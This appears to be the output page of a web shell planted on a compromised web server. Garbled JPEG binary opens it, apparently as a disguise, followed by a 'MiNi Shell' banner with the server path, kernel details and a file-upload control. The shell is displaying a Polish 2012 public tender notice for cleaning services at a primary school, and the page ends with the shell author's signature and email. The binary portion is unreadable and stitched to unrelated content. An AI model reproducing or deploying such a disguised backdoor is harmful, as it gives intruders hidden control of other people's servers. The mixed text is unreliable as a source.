JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121130/481756-N-2012.html

<p class="kh_header"><b>Puszczykowo: Wykonywanie usługi kompleksowego utrzymania czystości i porządku
w budynku Szkoły Podstawowej nr 1 w Puszczykowie w roku 2013</b><br>
<b>Numer ogłoszenia: 481756 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 1 , ul. Wysoka 1, 62-040 Puszczykowo, woj. wielkopolskie, tel. 0-61 8133-461, faks 0-61 8133-461.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp1puszczykowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szkoła Podstawowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usługi kompleksowego utrzymania czystości i porządku
w budynku Szkoły Podstawowej nr 1 w Puszczykowie w roku 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowe utrzymanie czystości i porządku w budynku Szkoły Podstawowej nr 1 w Puszczykowie. Przedmiot zamówienia obejmuje codzienne sprzątanie (od poniedziałku do piątku) po zajęciach lekcyjnych pomieszczeń szkolnych o łącznej powierzchni 3.970 m2 oraz pełnienie dyżuru podczas zajęć lekcyjnych w godzinach od 9.00 do 14.00, a także sprzątanie w dodatkowe dni związane z organizacją roku szkolnego ustalone przez dyrektora szkoły ( ok. 3 dni w roku ). 
Zamawiający zakłada, że usługa sprzątania świadczona będzie 22 dni w miesiącu przez 11 miesięcy.

Wynagrodzenie wyliczone będzie na podstawie cen jednostkowych wnikających z oferty Wykonawcy za faktyczne wykonanie poszczególnych usług wchodzących w zakres przedmiotu zamówienia oraz ilości dni 
w których usługa była świadczona.

Zakres codziennego sprzątania obejmuje w szczególności:
1)	zamiatanie i mycie podłóg i posadzek, oraz usuwanie zanieczyszczeń stałych ( np.: guma do żucia itp. );
2)	zamiatanie, mycie nawierzchni parkietowej w sali gimnastycznej wraz ze sprzątaniem przyległych do sali gimnastycznej szatni, pomieszczeń socjalnych oraz sanitariatów;
3)	czyszczenie odkurzaczem  wszystkich powierzchni pokrytych wykładziną dywanową oraz dywanów,
4)	usuwanie kredy z korytek przy tablicach oraz  z listew przypodłogowych przy tablicach;
5)	mycie stołów i krzeseł, systematyczne usuwanie ze spodnich części stołów i krzeseł gum do żucia lub tym podobnych zanieczyszczeń.
6)	porządkowanie i dezynfekcja sanitariatów (umywalki, muszle klozetowe, pisuary, czyszczenie glazury łazienkowej, armatury, luster wiszących);
7)	mycie, czyszczenie i wycieranie kurzu z powierzchni biurek, szaf, szafek i innego sprzętu biurowego 
i komputerowego, a także: parapetów, pulpitów, listew ściennych, półek, drzwi, tablic, itp., konserwacja sprzętu komputerowego środkami antystatycznymi;
8)	opróżnianie i czyszczenie koszy na śmieci oraz wyposażenie ich we worki foliowe na śmieci, wymiana worków;
9)	bieżące uzupełnianie pojemników w papier toaletowy, ręczniki papierowe oraz mydło w płynie. Ilość pojemników będących na wyposażaniu szkoły:
               - na papier toaletowy o 27 cm - 12 szt.
	  - na papier toaletowy o 12 cm  - 3 szt.
               - ręczniki papierowe składane - 24 szt.
               - mydło w płynie                       - 28 szt.
(zakup papieru toaletowego, ręczników papierowych oraz mydła znajduje się w gestii Wykonawcy. Szkoła liczy 485 uczniów oraz zatrudnia 57 pracowników w różnym wymiarze godzin od poniedziałku do piątku z wyłączeniem przerw świątecznych, ferii zimowych i wakacji letnich);
10)	dwukrotne w trakcie popołudniowej zmiany zmywanie na mokro powierzchni parkietu sali gimnastycznej ( pierwszy raz o 17.00 drugi o 22.00 );
11)	systematyczne informowanie woźnych o stwierdzonych uszkodzeniach i usterkach w obrębie sprzątanych odcinków.

Ponadto zakres sprzątania obejmuje:
1)	cotygodniowe pastowanie podłóg w salach lekcyjnych i gabinetach, usuwanie pajęczyn; 
2)	cotygodniowe pranie ręczników ( stosownie do kolorów) i ich wymiana na czyste (zakup proszku znajduje się w gestii Wykonawcy);
3)	raz w miesiącu dezynfekowanie stacjonarnych aparatów telefonicznych odpowiednim do tego celu  preparatem;
4)	raz w miesiącu mycie ścian (lamperia), mycie grzejników i osłon grzejnikowych, lamp oświetleniowych.

Zamawiający wymaga aby podczas sprzątania sal lekcyjnych i gabinetów pomieszczenia były dokładnie wietrzone.

Zakres codziennego pełnienia dyżuru w godz. od 9.00 do 14.00 obejmuje w szczególności:

1)	utrzymanie w czystości, korytarzy i klatek schodowych w budynku szkoły, opróżnianie koszy znajdujących się na korytarzach szkolnych;
2)	dbanie o czystość w toaletach - sprzątanie i wietrzenie po każdej przerwie w toaletach budynku głównego szkoły oraz dwa razy dziennie w toaletach budynku starej szkoły;
3)	zmywanie z podłóg plam np. po rozlanych płynach oraz innych nieczystości;
4)	raz dziennie czyszczenie szyb w drzwiach wejściowych;
5)	zamiecenie i umycie na mokro podczas dużej przerwy międzylekcyjnej (20 minut) powierzchni parkietu w sali gimnastycznej.

          Oprócz bieżącego, codziennego sprzątania do zadań Wykonawcy należy również:

1)	dwa razy w roku mycie okien o łącznej powierzchni 1.130 m2. Mycie otworów okiennych (szyb i ram okiennych od wewnątrz i z zewnątrz) wraz z parapetami, polegające na tym, iż technika mycia powinna być dostosowana do rodzaju okien - okna wykonane z PCV. Mycie szyb zabezpieczonych folią antywłamaniową przy użyciu delikatnych środków myjących;
2)	dwa razy w roku pranie firanek, zasłon, a także zawieszanie firanek we wszystkich     pomieszczeniach;
3)	dwa razy w roku czyszczenie żaluzji poziomych (55 m2 ), rolet ( 179 m2 );
4)	w dniach wywiadówek, spotkań, dyskotek, itp. sprzątanie pomieszczeń przed rozpoczęciem i zakończeniem spotkań;
5)	dwa razy w roku, (w miesiącach: styczeń/luty oraz lipiec/sierpień) mechaniczne polerowanie korytarzy wraz z nałożeniem warstwy preparatu ochronnego zabezpieczającego lśniący wygląd nawierzchni;
6)	dwa razy w roku mechaniczne czyszczenie posadzki w holu na parterze.
Wszystkie wymienione wyżej prace wykonane zostaną przy użyciu własnych środków czystości oraz narzędzi i sprzętu. Wykonawca zobowiązany jest również do wyposażenia swoich pracowników w odpowiednią odzież 
i obuwie ochronne.

Wykonawca zobowiązany jest do utrzymania w należytym stanie sanitarno-porządkowym powierzchnie poziome i pionowe z uwzględnieniem, iż w pokojach biurowych występują wykładziny PCV, dywanowe, na korytarzach oraz holach i klatkach schodowych występują wykładziny, płytki ceramiczne, lenteks, lastrico.             W toaletach występuje terakota lub lastriko. Zamawiający wymaga, aby raz w tygodniu podłogi w klasach były pokryte emulsją wysokopołyskową (ekologiczną). 

Ustala się systematyczne uzupełnianie środków higienicznych w pomieszczeniach sanitarnych: mydła, papieru toaletowego, odświeżaczy, papierowych ręczników, worków na śmieci, których zakup leży w gestii Wykonawcy.

Zamawiający wymaga - w celu uniknięcia nieprzyjemnego zapachu aby końcówki mopa po każdym dniu pracy były dokładnie płukane i suszone oraz wymieniane raz w miesiącu na nowe. 

Wykonawca zobowiązany jest do wykonania usługi środkami czystości posiadającymi atesty oraz świadectwa dopuszczające ich stosowanie.

Wykonawca skieruje do realizacji zamówienia odpowiednią ilość pracowników zapewniającą należyte wykonanie zamówienia ( jedna osoba pełniąca dyżur od 9.00 do 14.00, trzy osoby od godz. 14.00 - 20.00,  jedna osoba do sali gimnastycznej od godz. 17.00 - 23.00 ).
Razem 5 osób lub więcej, jeżeli wynika to ze standardów przyjętych przez Wykonawcę do wykonywania tego typu usług.

W przypadku kontroli Stacji Sanitarno - Epidemiologicznej, w wyniku, której stwierdzone zostaną uchybienia w zakresie czystości i porządku w pomieszczeniach szkoły, wszelką odpowiedzialność ponosi Wykonawca. Wykonawca zobowiązany jest do pokrycia szkód wynikających z działań lub zaniechań związanych                       z realizacją niniejszego zamówienia.

Przed rozpoczęciem współpracy Zamawiający przeprowadzi szczegółową konsultację z  Wykonawcą.
Sprzątanie budynków odbywać się będzie w każdy dzień tygodnia (od poniedziałku do piątku) wyłączając święta państwowe i kościelne, oraz okres wakacji. Sprzątanie powinno odbywać się na zasadzie podziału powierzchni objętych sprzątaniem na rejony i za każdy rejon odpowiadają osoby wyznaczone do jego sprzątania.

Wykonawca zobowiązany jest do zapewnienia osoby nadzorującej jakość i czas świadczonych usług. Zamawiający wymaga aby osoba nadzorująca była w stałym kontakcie z osobami nadzorującymi wykonywanie usługi ze strony Zamawiającego oraz aby osoba nadzorująca stawiała się na każde żądanie Zamawiającego w czasie nie dłuższym niż 2 godziny od chwili jej telefonicznego powiadomienia. np.: w celu wspólnej kontroli jakości świadczonych usług lub uczestnictwa w kontrolach SANEPID-u. Wykonawca zobowiązany jest do przedstawiania Zamawiającemu miesięcznych harmonogramów (list) pracy osób sprzątających..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.93.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca składa:
1)	wypełniony i podpisany formularz ofertowy ( wg. wzoru stanowiącego załącznik nr 1 do niniejszej specyfikacji),
2)	upoważnienie w przypadku składania oferty wspólnej do reprezentowania wszystkich podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość istotnej zmiany postanowień zawartej Umowy w stosunku do treści oferty na podstawie której dokonał wyboru Wykonawcy. Zmiany mogą dotyczyć:
1.    Po akceptacji Zamawiającego - zmiany podwykonawców.
(powyższa zmiana nie wymaga zawarcia aneksu do umowy)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp1puszczykowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa nr 1
ul. Wysoka 1, 62-040 Puszczykowo
www.sp1puszczykowo.pl
pon. - pt. 8.00 -15.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 11:55, miejsce: Oferty należy składać do dnia 10 grudnia 2012 roku do godz. 11:55 w: Szkole Podstawowej nr 1 przy ulicy Wysokiej w Puszczykowie - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com